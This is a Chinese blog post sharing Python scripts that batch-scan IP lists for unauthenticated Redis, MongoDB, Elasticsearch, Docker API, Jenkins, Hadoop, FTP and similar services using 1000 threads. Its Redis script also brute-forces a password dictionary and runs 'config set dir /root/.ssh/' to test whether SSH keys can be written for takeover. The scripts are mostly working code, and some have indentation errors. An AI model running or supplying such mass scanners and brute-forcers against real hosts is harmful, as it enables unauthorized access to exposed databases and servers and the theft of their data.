未授权漏洞批量扫描poc

最新推荐文章于 2024-04-20 21:55:28 发布
最新推荐文章于 2024-04-20 21:55:28 发布
阅读量2.2k 收藏 19
点赞数 2
分类专栏: 未授权漏洞合集 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/119715931
版权

一般来说我们检验是否存在漏洞,都是一个个的检验。但是如果遇到了目标有很多,这个怎么办呢?
这里提供2个思路

一、msf的扫描

找到

1.1、指定文件ip扫描

192.168.100.222
192.168.100.223
192.168.100.224
192.168.100.225
192.168.100.226
这样一行一行写入文本
在这里插入图片描述

1.2、指定网络段ip扫描

一般都是扫C段,也就是/24就行了,尽量不要去搞A(8)、B段(16),太多了
在这里插入图片描述

二、楼主这里提供一些批量poc

import socket
import pymongo
import requests
import ftplib
from tqdm import tqdm
import sys
from concurrent.futures import ThreadPoolExecutor


def redis(ip):
    try:
        socket.setdefaulttimeout(5)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, 6379))
        s.send(bytes("INFO\r\n", 'UTF-8'))
        result = s.recv(1024).decode()
        if "redis_version" in result:
            print(ip + ":6379 redis未授权")
        s.close()
    except Exception as e:
        pass
    finally:
        bar.update(1)

def mongodb(ip):
    try:
        conn = pymongo.MongoClient(ip, 27017, socketTimeoutMS=4000)
        dbname = conn.list_database_names()
        print(ip + ":27017 mongodb未授权")
        conn.close()
    except Exception as e:
        pass
    finally:
        bar.update(1)

def memcached(ip):
    try:
        socket.setdefaulttimeout(5)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, 11211))
        s.send(bytes('stats\r\n', 'UTF-8'))
        if 'version' in s.recv(1024).decode():
            print(ip + ":11211 memcached未授权")
        s.close()
    except Exception as e:
        pass
    finally:
        bar.update(1)

def elasticsearch(ip):
    try:
        url = 'http://' + ip + ':9200/_cat'
        r = requests.get(url, timeout=5)
        if '/_cat/master' in r.content.decode():
            print(ip + ":9200 elasticsearch未授权")
    except Exception as e:
        pass
    finally:
        bar.update(1)

def zookeeper(ip):
    try:
        socket.setdefaulttimeout(5)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, 2181))
        s.send(bytes('envi', 'UTF-8'))
        data = s.recv(1024).decode()
        s.close()
        if 'Environment' in data:
            print(ip + ":2181 zookeeper未授权")
    except:
        pass
    finally:
        bar.update(1)

def ftp(ip):
    try:
        ftp = ftplib.FTP.connect(ip,21,timeout=5)
        ftp.login('anonymous', 'Aa@12345678')
        print(ip + ":21 FTP未授权")
    except Exception as e:
        pass
    finally:
        bar.update(1)

def CouchDB(ip):
    try:
        url = 'http://' + ip + ':5984'+'/_utils/'
        r = requests.get(url, timeout=5)
        if 'couchdb-logo' in r.content.decode():
            print(ip + ":5984 CouchDB未授权")
    except Exception as e:
        pass
    finally:
        bar.update(1)

def docker(ip):
    try:
        url = 'http://' + ip + ':6071'+'/version'
        r = requests.get(url, timeout=5)
        if 'ApiVersion' in r.content.decode():
            print(ip + ":6071 docker api未授权")
    except Exception as e:
        pass
    finally:
        bar.update(1)

def Hadoop(ip):
    try:
        url = 'http://' + ip + ':50070'+'/dfshealth.html'
        r = requests.get(url, timeout=5)
        if 'hadoop.css' in r.content.decode():
            print(ip + ":50070 Hadoop未授权")
    except Exception as e:
        pass
    finally:
        bar.update(1)
		
def Jenkins(ip):
    try:
        url = 'http://' + ip + ':8080'+'/manage'
        r = requests.get(url, timeout=5)
        if 'Jenkins' in r.content.decode():
            print(ip + ":8080 Jenkins api未授权")
    except Exception as e:
        pass
    finally:
        bar.update(1)

if __name__ == '__main__':
    if len(sys.argv) == 1:
        print("Usage:python3 unauthorized-check.py url.txt")
    file = sys.argv[1]
    with open(file, "r", encoding='UTF-8') as f:
        line = [i for i in f.readlines()]
    bar = tqdm(total=len(line)*9)
    with ThreadPoolExecutor(1000) as pool:
        for target in line:
            target=target.strip()
            pool.submit(redis, target)
            pool.submit(Hadoop, target)
            pool.submit(docker, target)
            pool.submit(CouchDB, target)
            pool.submit(ftp, target)
            pool.submit(zookeeper, target)
            pool.submit(elasticsearch, target)
            pool.submit(memcached, target)
            pool.submit(mongodb, target)
			pool.submit(Jenkins, target)

楼主这里试一试elasticsearch的未授权poc
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

还有其他的一些单独的批量poc,楼主也放一下。(这里注意使用py2)

Redis的未授权批量poc

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
import socket
import sys
PASSWORD_DIC=['redis','root','oracle','password','p@aaw0rd','abc123!','123456','admin']
def check(ip, port, timeout):
    try:
        socket.setdefaulttimeout(timeout)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, int(port)))
        s.send("INFO\r\n")
        result = s.recv(1024)
        if "redis_version" in result:
            print u"%s:%s未授权访问"%(ip,port)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, int(port)))
            s.send("config set dir /root/.ssh/\r\n")
            content = s.recv(1024)
            print(content)
            if "OK" in content:
                print u"%s:%s .ssh目录存在且权限足够"%(ip,port)
            elif "error" in content:
                print u"%s:%s 无法写入"%(ip,port)
        elif "Authentication" in result:
            for pass_ in PASSWORD_DIC:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ip, int(port)))
                s.send("AUTH %s\r\n" %(pass_))
                result = s.recv(1024)
                if '+OK' in result:
                    print u"%s:%s存在弱口令,密码:%s" % (ip,port,pass_)
    except Exception, e:
        print e
        pass
if __name__ == '__main__':
    doc = open("hello_world.txt", "r")
    lines = doc.readlines()
    for ip in lines:
        #print(type(ip))
        #print(ip.strip())
        check(ip.strip(),6380,timeout=10)
        #print(type(ip))
    doc.close()

Kibana的未授权批量poc

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
 
import requests
def Hadoop_check(ip, port, timeout):
    try:
        url = "http://"+str(ip)+":"+str(port)+"/app/kibana"
        response = requests.get(url) 
        print(url)
        print(response.content)
        if "/app/kibana" in response.content:
			print '[+++++] Kibana [+++++]: ' +ip+':'+str(port)
			
    except:
        pass
    


if __name__ == '__main__':
    doc = open("ip.txt", "r")
    lines = doc.readlines()
    for ip in lines:
        #print(type(ip))
        #print(ip.strip())
        Hadoop_check(ip.strip(),5601,5)
        #print(type(ip))
    doc.close()

Hadoop的未授权批量poc

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
 
import requests
def Hadoop_check(ip, port, timeout):
    try:
        url = "http://"+str(ip)+":"+str(port)+"/cluster"
        response = requests.post(url) 
        if "/cluster/cluster" in response.content:
            print '[+++++] Hadoop [+++++]: ' +ip+':'+str(port)
            
    except:
        pass
    


if __name__ == '__main__':
    doc = open("ip.txt", "r")
    lines = doc.readlines()
    for ip in lines:
        #print(type(ip))
        print(ip.strip())
        Hadoop_check(ip.strip(),8088,5)
        #print(type(ip))
    doc.close()

Elasticsearch的未授权批量poc

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
 
import requests
def Elasticsearch_check(ip, port, timeout):
    try:
        url = "http://"+str(ip)+":"+str(port)+"/_cat"
        response = requests.get(url) 
        if "/_cat/master" in response.content:
			print '[+++++] Elasticsearch: ' +ip+':'+str(port)
    except:
        pass
    


if __name__ == '__main__':
    doc = open("ip.txt", "r")
    lines = doc.readlines()
    for ip in lines:
        #print(type(ip))
        #print(ip.strip())
        Elasticsearch_check(ip.strip(),9200,5)
        #print(type(ip))
    doc.close()
樱浅沐冰
关注
  • 2
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
盘点那些漏洞 POC 测试工具
wuli1024的博客
11-11 1717
以上工具覆盖仅仅个人总结,还有其他专注 POC 检测的工具,比如知道创宇的 pocsuite3,只随软件携带来十几个案例 POC,目前我使用最多的就是 xray、xpoc、nuclei 这些工具,最近开始用 afrog,大家有好用的工具欢迎留言讨论,一起学习探讨。文库目录:https://wiki.xazlsec.com/static/forder.html。
计算机漏洞安全相关的概念POC 、EXP 、VUL 、CVE 、0DAY
guoyuxin3的博客
05-19 3873
目录 1.POC 2.EXP 3.VUL 4.CVE漏洞编号 5.0DAY漏洞和0DAY攻击 1.POC POC,Proof ofConcept,中文意思是“观点证明”。这个短语会在漏洞报告中使用,漏洞报告中的POC则是一段说明或者一个攻击的样例,使得读者能够确认这个漏洞是真实存在的。 2.EXP EXP,Exploit,中文意思是“漏洞利用”。意思是一段对漏洞如何利用的详细说明或者一个演示的漏洞攻击代码,可以使得读者完全了解漏洞的机理以及利用的方法。 3.VUL VUL,Vulner
漏洞扫描工具 -- oday_oday的poc管理是啥,2024年最新非科班程序员求职经历分享
最新发布
2401_83947434的博客
04-20 501
javafx编写的poc管理和漏洞扫描小工具,本工具是采用javafx编写,使用sqllite进行poc储存的poc管理和漏洞扫描集成化工具。主要功能是poc管理,并且采用多线程进行漏洞扫描,不具有漏洞利用功能。
Niu!简单漏洞的快速批量验证脚本
潇湘信安的博客
07-16 947
追梦信安@W01fh4cker师傅新造的一个‬轮子,适‮利合‬用简‮的单‬漏洞批量扫描,例‮只如‬需要在url后面拼接一个payload,然‮根后‬据返‮包回‬判断关键字是‮存否‬在这种。
POC-bomber(漏洞检测/利用工具)
weixin_71169068的博客
06-29 1716
本项目收集互联网各种危害性大的 RCE · 任意文件上传 · 反序列化 · sql注入 等高危害且能够获取到服务器核心权限的漏洞POC/EXP,并集成在 POC bomber 武器库中,利用大量高危害POC对单个或多个目标进行模糊测试,以此在大量资产中快速获取发现脆弱性目标,获取目标服务器权限。适用场景包括但不仅限于以下: hvv快速打点 漏洞资产测绘 维护个人漏洞扫描
NACOS身份认证绕过漏洞批量检测poc.7z
02-24
NACOS身份认证绕过漏洞批量检测poc.7z
0708漏洞批量扫描工具.zip
10-31
0708漏洞的危害和永恒之蓝一样,受影响的用户很多,这款漏洞批量扫描工具是使用360poc导出的,支持扫描目标导入,以及扫描结果导出的功能,支持多线程批量快速扫描
小龙web漏洞扫描工具
12-06
小龙web漏洞扫描工具,可批量扫描,绝对无毒,拒绝黑软
内网综合扫描工具fscan的详细使用
03-27
支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 主要功能 1.信息搜集: 存活探测(icmp) ...
thinkphp漏洞检测工具
06-06
thinkphp漏洞检测工具
POC批量验证Python脚本编写
hackzkaq的博客
05-06 3666
更多黑客技能 公众号:白帽子左一 作者:掌控安全- webdogc 编写目的 批量验证poc,Python代码练习。 需求分析 1、poc尽可能简单。 2、多线程。 3、联动fofa获取目标。 4、随机请求头. 实现过程 脚本分为三个模块,获取poc及目标、多线程批量请求验证、输出结果。其中批量请求验证包括构造多线程,修改请求参数,发送请求三个部分。 Main函数 在main函数中,主要有三个部分获取poc及目标,多线程(将目标填充到队列,创建多线程并启动)、输出结果。 具体实现如下: def mai
Apche struts-062远程代码执行漏洞(含批量验证poc),2024年最新武汉软通动力网络安全面试
2401_83946315的博客
04-15 253
快,但一群人才能走的更远!当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。访问127.0.0.1:8080/?id=,出现如下页面。
77 Python开发-批量Fofa&SRC提取&POC验证
山兔的博客
01-02 896
脚本在读取的时候有时候会漏掉一两条数据,这个时候要加异常,而且要延迟一下,因为你速度过快的话,你这个程序在跑的时候,明明这个网站很慢,但是程序不会等待它运行完之后,进行操作,所以我们在操作的时候尽量给个延迟和异常处理,你先尝试正常访问,然后在给它加个延迟和异常处理。单次请求看到的就是这些东西,这个是python请求完之后,看到的东西,我们在里面要把我们想要的东西筛选出来,因为这里面我们有些东西不需要。数据提出了之后,我们就可以进行刚才的漏洞利用,在同级目录下创建 check_vuln.py,写入如下代码。
常用的30+种授权访问漏洞汇总
qq_50854662的博客
09-17 5153
常用的30+种授权访问漏洞汇总
JAVA 插件化漏洞扫描器,Gui基于javafx。POC 目前集成 Weblogic、Tomcat、Shiro、Spring等
leah126的博客
02-10 1695
由于传播、利用本公众号夜组安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号夜组安全及作者不为此承担任何责任,一旦造成后果请自行承担!),Gui基于javafx,POC 目前集成 Weblogic(21个),Tomcat(2)、Shiro、Spring等陆续更新中。POC插件目录放在同目录下目录结构如下,Plugin/中间件类型/libs(poc的依赖)、payloads(poc本体)/。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。**】获取****下载链接**
编写poc和exploit的几款常用工具介绍
热门推荐
koozxcv的博客
06-12 1万+
1.pwntools pwntools是一个CTF框架和漏洞利用开发库,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。 pwntools对Ubuntu 12.04和14.04的支持最好,但是绝大多数的功能也支持Debian, Arch, FreeBSD, OSX, 等等。 sudo pip install pwntools即可安装
POC-T批量poc验证工具
Grey的博客
03-22 1万+
POC-T神器介绍批量验证要解决的三个关键点: 数据:数据怎么来? 处理:逻辑是什么?  并发:如何实现?安装过程:git clone [url]https://github.com/Xyntax/POC-T[/url] pip install -r requirement.txt python POC-T.py数据:数据来源很丰富,也很贴心。包括单个目标(-iS)、文件导入(-iF)、搜索引...
MongoDB授权访问
Fly_鹏程万里
06-07 3978
漏洞简介 开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作(增、删、改、查高危动作)而且可以远程访问数据库。    造成授权访问的根本原因就在于启动 Mongodb 的时候设置 --auth 也很少会有人会给数据库添加上账号密码(默认空口令),使用默认空口令这将导致恶意攻击者无需进行账号认证就可以登陆到数据服务器。 漏洞复现 环境介绍 目标靶机: Kali ip地址: 192.168.18.128 连接工具:Xshell ..
nacos身份认证绕过漏洞批量检测poc
06-23
### 回答1: Nacos是一种开源的配置中心和服务发现平台,可以帮助开发者更方便地管理微服务架构。然而,最近在Nacos中发现了一个名为身份认证绕过的漏洞,这使得攻击者可以绕过身份验证,执行恶意操作。 为了帮助企业和个人快速检测到这个安全漏洞,并采取相应的补救措施,一些安全研究者开发了批量检测POC。这个POC利用公开的漏洞信息,测试Nacos的登录和注册功能,以确定Nacos是否存在身份认证绕过漏洞。 使用这个批量检测POC,用户可以将所有的IP地址列表保存到一个文本文件中,然后通过简单的命令行选项传递该文本文件的路径。这个POC将自动扫描并验证每个IP地址是否容易受到身份认证绕过漏洞的攻击。 总体来说,这个批量检测POC提供了一种简单、快速、有效的方式,帮助企业和个人识别并修复Nacos中的身份认证绕过漏洞,从而提高系统的安全性和可靠性。同时,这也反映了业界对于技术安全的持续关注和努力。 ### 回答2: nacos是一个云原生的动态服务发现和配置管理平台,但是在nacos中存在着身份认证绕过漏洞,攻击者可以通过此漏洞直接绕过身份验证,获取到nacos的管理权限。为了防止此漏洞被滥用,需要及时对其进行检测和修复。 Nacos身份认证绕过漏洞批量检测可以采用Poc技术进行,Poc即Proof of Concept,意为概念证明。通过编写Poc代码,可以在不影响正常运行的情况下,模拟攻击行为,发现漏洞并进行修复。 对于nacos身份认证绕过漏洞批量检测Poc,可以通过以下步骤实现: 1. 首先,确定目标,即需要检测的nacos服务地址。可以通过搜索引擎、网络扫描等方式获取目标。 2. 编写Poc代码,对目标进行检测。具体步骤如下: (1)通过无需认证的接口验证目标是否存在身份认证绕过漏洞。 (2)如果存在漏洞,则可以使用管理员权限执行恶意操作,如读取、修改、删除配置文件等。 3. 对漏洞进行修复。修补漏洞的方法是将nacos系统更新至最新版本,并且配置正确,以避免任何安全问题。 通过进行nacos身份认证绕过漏洞批量检测Poc,可以及时发现和修复nacos系统中的漏洞问题,从而提高系统的安全性和稳定性。同时,作为云原生的重要组件之一,nacos系统的安全问题也需要得到更高的重视和加强保护。 ### 回答3: Nacos是一种开源的分布式服务发现、配置和管理平台,最近出现了一个身份认证绕过漏洞。攻击者可以利用该漏洞绕过Nacos的身份验证,实现授权访问敏感信息或执行恶意操作。为了增强安全性,开发人员需要尽快修补漏洞。 为方便安全研究人员和开发人员识别漏洞,可以使用批量检测pocpoc是Proof of Concept的缩写,通常是指一段代码或脚本,用来验证漏洞是否存在的可复现方式。通过使用poc,可以确认漏洞的确存在,便于修复。 对于Nacos身份认证绕过漏洞,可以使用poc进行批量检测。首先需要构造一份包含有效用户名和密码的列表,然后使用poc对Nacos进行检测。如果检测到漏洞,则会产生警报或输出,方便管理员及时修复漏洞。 因此,在使用Nacos时,开发人员需要及时修复漏洞,并通过poc等方式进行漏洞检测,以便及时发现和修复其他潜在的安全漏洞,提高系统的安全性和可靠性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值